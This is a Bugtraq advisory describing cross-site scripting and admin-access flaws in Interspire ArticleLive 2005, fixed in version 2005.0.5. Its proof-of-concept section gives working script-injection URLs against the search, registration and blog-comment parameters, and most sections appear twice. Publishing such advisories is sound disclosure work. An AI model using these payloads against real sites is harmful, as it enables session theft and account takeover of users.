Interspire ArticleLive Multiple Remote Vulnerabilities
BID:13493
Info
Interspire ArticleLive Multiple Remote Vulnerabilities
| Bugtraq ID: | 13493 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 04 2005 12:00AM |
| Updated: | May 04 2005 12:00AM |
| Credit: | Discovery is credited to dcrab <[email protected]>. |
| Vulnerable: |
Interspire ArticleLive 2005 |
| Not Vulnerable: |
Interspire ArticleLive 2005.0.5 |
Discussion
Interspire ArticleLive Multiple Remote Vulnerabilities
Interspire ArticleLive is reportedly prone to multiple vulnerabilities. These issues may allow a remote attacker to gain administrative access to the application and carry out various cross-site scripting attacks.
Interspire ArticleLive 2005 is reportedly affected by these issues.
Interspire ArticleLive is reportedly prone to multiple vulnerabilities. These issues may allow a remote attacker to gain administrative access to the application and carry out various cross-site scripting attacks.
Interspire ArticleLive 2005 is reportedly affected by these issues.
Exploit / POC
Interspire ArticleLive Multiple Remote Vulnerabilities
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categor
ies=0
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)</sc
ript>&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e='"><script>alert(document.cookie)</script>&LastName=&Email=&Biography=dcrab&Picture=dcrab
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e=&LastName='"><script>alert(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Picture=dcrab
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab
http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>
An exploit is not required.
The following proof of concept examples are available:
http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categor
ies=0
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)</sc
ript>&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e='"><script>alert(document.cookie)</script>&LastName=&Email=&Biography=dcrab&Picture=dcrab
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e=&LastName='"><script>alert(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Picture=dcrab
http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab
http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>
Solution / Fix
Interspire ArticleLive Multiple Remote Vulnerabilities
Solution:
The vendor has addressed these issues in Interspire Article Live 2005.0.5:
Interspire ArticleLive 2005
Solution:
The vendor has addressed these issues in Interspire Article Live 2005.0.5:
Interspire ArticleLive 2005
-
Interspire ArticleLive 2005.0.5
http://www.interspire.com/articlelive/
References
Interspire ArticleLive Multiple Remote Vulnerabilities
References:
References:
- ArticleLive Changelog (Interspire)
- ArticleLive Homepage (Interspire)